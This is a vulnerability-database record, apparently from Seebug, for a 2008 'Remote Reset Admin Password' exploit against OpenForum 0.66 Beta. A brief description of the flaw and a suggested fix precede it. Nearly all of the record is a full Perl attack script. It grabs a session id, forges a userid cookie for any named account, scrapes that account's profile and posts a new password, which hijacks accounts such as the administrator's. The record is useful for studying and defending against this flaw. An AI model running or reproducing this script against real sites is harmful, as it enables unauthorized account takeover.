Description
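No description provided by source. Judging from the listing below, the flaw appears to be an authorization failure in OpenForum 0.66 Beta's profile.php: a profile update, including the password field, seems to be accepted for whichever account is named in a client-supplied `userid` cookie, paired with a session id issued before any login. The fix on the application side would be to derive the acting user from server-side session state only and to require the current password before a password change. The record carries no CVE identifier and no CVSS score.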
{"href": "https://www.seebug.org/vuldb/ssvid-10144", "status": "poc", "bulletinFamily": "exploit", "modified": "2008-11-30T00:00:00", "title": "OpenForum 0.66 Beta Remote Reset Admin Password Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-10144", "cvelist": [], "description": "No description provided by source.", "viewCount": 4, "published": "2008-11-30T00:00:00", "sourceData": "\n #!/usr/bin/perl -w\r\n#========================================================\r\n#OpenForum 0.66 Beta Remote Reset Admin Password Exploit\r\n#========================================================\r\n#\r\n# ,--^----------,--------,-----,-------^--,\r\n# | ||||||||| `--------' |\t O\t .. CWH Underground Hacking Team ..\r\n# `+---------------------------^----------|\r\n# `\\_,-------, _________________________|\r\n# / XXXXXX /`| /\r\n# / XXXXXX / `\\ /\r\n# / XXXXXX /\\______(\r\n# / XXXXXX / \r\n# / XXXXXX /\r\n# (________( \r\n# `------'\r\n#\r\n#AUTHOR : CWH Underground\r\n#DATE : 29 November 2008\r\n#SITE : cwh.citec.us\r\n#\r\n#\r\n#####################################################\r\n#APPLICATION : OpenForum\r\n#VERSION : 0.66 Beta\r\n#DOWNLOAD : http://downloads.sourceforge.net/openforum/openforum066.zip\r\n######################################################\r\n#######################################################################################\r\n#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK\r\n#Special Thx : asylu3, str0ke, citec.us, milw0rm.com\r\n#######################################################################################\r\n\r\nuse LWP;\r\nuse HTTP::Request;\r\nuse HTTP::Request::Common;\r\n\r\nprint "\\n==================================================\\n";\r\nprint " Openforum 0.66 beta Remote Reset Admin Password exploit \\n";\r\nprint " \\n";\r\nprint " Discovered By CWH Underground \\n";\r\nprint 
"==================================================\\n";\r\nprint " \\n";\r\nprint " ,--^----------,--------,-----,-------^--, \\n";\r\nprint " | ||||||||| `--------' | O \\n";\r\nprint " `+---------------------------^----------| \\n";\r\nprint " `\\_,-------, _________________________| \\n";\r\nprint " / XXXXXX /`| / \\n";\r\nprint " / XXXXXX / `\\ / \\n";\r\nprint " / XXXXXX /\\______( \\n";\r\nprint " / XXXXXX / \\n";\r\nprint " / XXXXXX / .. CWH Underground Hacking Team .. \\n";\r\nprint " (________( \\n";\r\nprint " `------' \\n";\r\nprint " \\n";\r\n\r\nif ($#ARGV ne 2) {\r\n\tprint "Usage: ./openforum.pl <url-to-index-page> <user account> <new password>\\n";\r\n\tprint "Ex. ./openforum.pl http://www.target.com/openforum/index.php admin cwhpass\\n";\r\n\texit();\r\n}\r\n\r\n$url = $ARGV[0];\r\n$user = $ARGV[1];\r\n$newpass = $ARGV[2];\r\n\r\nif ($url !~ /^http:\\/\\//) {\r\n\t$url = "http://".$url;\r\n}\r\n\r\nprint "[+] Target url: ".$url."\\n\\n";\r\n\r\n$req = HTTP::Request->new (GET => $url);\r\n$req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');\r\n$req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');\r\n$req->header (Accept_Language => 'en-us,en;q=0.5');\r\n\r\n$ua = LWP::UserAgent->new;\r\n$response = $ua->request ($req);\r\n\r\nif ($response->code ne 200) {\r\n\tprint "Error: Could not request for index page\\n";\r\n\texit ();\r\n}\r\n\r\n$header = $response->headers->as_string;\r\n\r\n($sessid) = $header =~ /sessid=(.+)\\n/;\r\nprint ":: Retreive session id ::\\n";\r\nprint "[+] ".$sessid."\\n\\n";\r\n\r\n$url =~ s/index\\.php$/profile.php?user=$user/;\r\n\r\n#print $url;\r\n\r\n\r\n\r\n$req = HTTP::Request->new (GET => $url);\r\n$req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');\r\n$req->header (Accept => 
'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');\r\n$req->header (Accept_Language => 'en-us,en;q=0.5');\r\n$req->header (Cookie => 'sessid='.$sessid.'; userid='.$user);\r\n\r\n$response = $ua->request ($req);\r\nif ($response->code ne 200) {\r\n\tprint "Error: Could not request for ".$user."'s profile page\\n";\r\n\texit ();\r\n}\r\n\r\n$content = $response->content;\r\n$update = "1";\r\n$adminaction = "";\r\n($email) = $content =~ /\\"email\\" value=\\"(.*?)\\"/;\r\n($signature) = $content =~ /\\"signature\\">(.*?)<\\/textarea>/;\r\n$day = "";\r\n$month = "";\r\n$year = "";\r\n($website) = $content =~ /\\"website\\" value=\\"(.*?)\\"/;\r\n($name) = $content =~ /\\"name\\" value=\\"(.*?)\\"/;\r\n($phone) = $content =~ /\\"phone\\" value=\\"(.*?)\\"/;\r\n($city) = $content =~ /\\"city\\" value=\\"(.*?)\\"/;\r\n($location) = $content =~ /\\"location\\" value=\\"(.*?)\\"/;\r\n$sytle = "";\r\n$submit = "Update!";\r\n\r\n\r\nprint ":: Update new password ::\\n\\n";\r\n$url =~ s/\\?user=admin//;\r\n\r\n\r\n$response = $ua->request (POST $url,\r\n\t\tUser_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18',\r\n\t\tAccept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',\r\n\t\tAccept_Language => 'en-us,en;q=0.5',\r\n\t\tCookie => 'sessid='.$sessid.'; userid='.$user,\r\n\t\tContent_Type => 'form-data',\r\n\t\tContent => [update => $update, user => $user, adminaction => '', email => $email, signature => $signature, website => $website, name => $name,\r\n\t\t\t\tphone => $phone, city => $city, location => $location, password => $newpass, submit => $submit]\r\n);\r\n\r\nif ($response->code ne 200) {\r\n\tprint "Error: Could not request for profile page\\n";\r\n\texit ();\r\n}\r\n\r\n$content = $response->content;\r\n\r\nif ($content =~ /<br>updated<br><table width=\\"100%\\">/) {\r\n\tprint "[+] Exploit 
Success\\n";\r\n\tprint "[+] New admin's password: ".$newpass."\\n";\r\n}\r\nelse\r\n{\r\n\tprint "[+] Exploit Failed\\n";\r\n}\n ", "id": "SSV:10144", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:19:48", "reporter": "Root", "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645477876}}
{}